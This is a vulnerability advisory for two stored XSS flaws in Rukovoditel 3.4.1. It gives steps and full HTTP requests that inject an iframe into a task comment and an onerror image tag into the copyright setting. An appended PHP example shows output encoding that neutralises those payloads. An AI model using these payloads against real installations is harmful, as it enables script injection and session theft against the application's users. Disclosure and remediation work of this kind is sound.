
Rukovoditel 3.4.1 - Multiple Stored XSS

Exploit Title: Rukovoditel 3.4.1 - Multiple Stored XSS
Version: 3.4.1
Bugs: Multiple Stored XSS
Technology: PHP
Vendor URL: https://www.rukovoditel.net/
Software Link: https://www.rukovoditel.net/download.php
Date of found: 24-06-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
====================================================
### XSS-1 ###
====================================================
Steps:
1. Login to account
2. Create project (http://localhost/index.php?module=items/items&path=21)
3. Add task
4. Open task
5. Add comment as <iframe src="https://14.rs"></iframe>
POST /index.php?module=items/comments&action=save&token=feoz9Jekua HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 241
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=items/info&path=21-2/22/22-1&redirect_to=subentity&gotopage[74]=1
Cookie: cookie_test=pleper_accept_for_session; sid=VFTRL4MHMBVDBRVFMB0RB54VO5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

form_session_token=feoz9jekua&path=21-2%2f22-1&fields%5B169%5D=47&fields%5B170%5D=53&fields%5B174%5D=3&description=%3Ciframe+src%3D%22https%3A%2F%2F14.rs%22%3E%3C%2Fiframe%3E&uploadfive_attachments_upload_attachments=&comment_attachments=
==================================
### XSS-2 ###
==================================
1. Admin account
2. Go to Configuration > Application
3. Set Copyright text to <img src=x onerror=alert(1)>
POST /index.php?module=configuration/save&redirect_to=configuration/application HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------12298384558648010343132232769
Content-Length: 2766
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?module=configuration/application
Cookie: cookie_test=pleper_accept_for_session; sid=VFTRL4MHMBVDBRVFMB0RB54VO5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="form_session_token"

JU271AAY1
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_name]"

Rukovoditel
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_short_name_mobile]"

FFGSDFGSDFG
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_short_name]"

Ruko
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="app_logo"; filename=""
Content-Type: application/octet-stream

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_logo]"

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_logo_url]"

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="app_favicon"; filename=""
Content-Type: application/octet-stream

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_favicon]"

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_copyright_name]"

<img src=x onerror=alert(1)>
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_language]"

english
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_skin]"

-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_timezone]"

America/New_York
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_rows_per_page]"

10
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_date_format]"

m/d/Y
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_datetime_format]"

m/d/Y H:i
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_number_format]"

2/./*
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[app_first_day_of_week]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[drop_down_menu_on_hover]"

0
-----------------------------12298384558648010343132232769
Content-Disposition: form-data; name="cfg[disable_check_for_updates]"

0
-----------------------------12298384558648010343132232769--
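Added defender-side example, not Rukovoditel's code and not part of this advisory: both findings above come down to a stored string (the comment description in XSS-1, cfg[app_copyright_name] in XSS-2) being written into an HTML page without encoding. The PHP script below takes exactly those two payload strings from the advisory as constructed input and shows the output-time encoding that makes them inert; the function names render_untrusted_text and contains_raw_markup are my own and are not part of the project.

```php
<?php
// Added example (not Rukovoditel's code): encode stored, user-controlled text
// at the point where it is written into HTML, so browser never parses it as markup.
declare(strict_types=1);

/**
 * Encode an untrusted string for use as HTML element content or inside a
 * double- or single-quoted attribute value.
 *  - ENT_QUOTES     also encodes the single quote (needed for attribute contexts)
 *  - ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string,
 *                   which would otherwise silently drop the value
 *  - ENT_HTML5      uses HTML5 entity names (e.g. &apos;)
 */
function render_untrusted_text(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Review helper: true when a string that is about to be emitted still contains
 * a raw '<' or '>' (i.e. it was never passed through render_untrusted_text).
 */
function contains_raw_markup(string $rendered): bool
{
    return strpbrk($rendered, '<>') !== false;
}

// Constructed sample: the two stored values used in this advisory.
$stored = [
    'comment description'     => '<iframe src="https://14.rs"></iframe>',
    'cfg[app_copyright_name]' => '<img src=x onerror=alert(1)>',
];

foreach ($stored as $field => $raw) {
    $safe = render_untrusted_text($raw);
    printf("%s\n  raw : %s  (raw markup: %s)\n  safe: %s  (raw markup: %s)\n\n",
        $field,
        $raw,  contains_raw_markup($raw)  ? 'yes' : 'no',
        $safe, contains_raw_markup($safe) ? 'yes' : 'no');
}
```

The encoding has to happen where the value meets HTML, not at save time: a value escaped on input is double-encoded when shown in a form field and still unsafe if it is later reused in a JavaScript or URL context, each of which needs its own encoder.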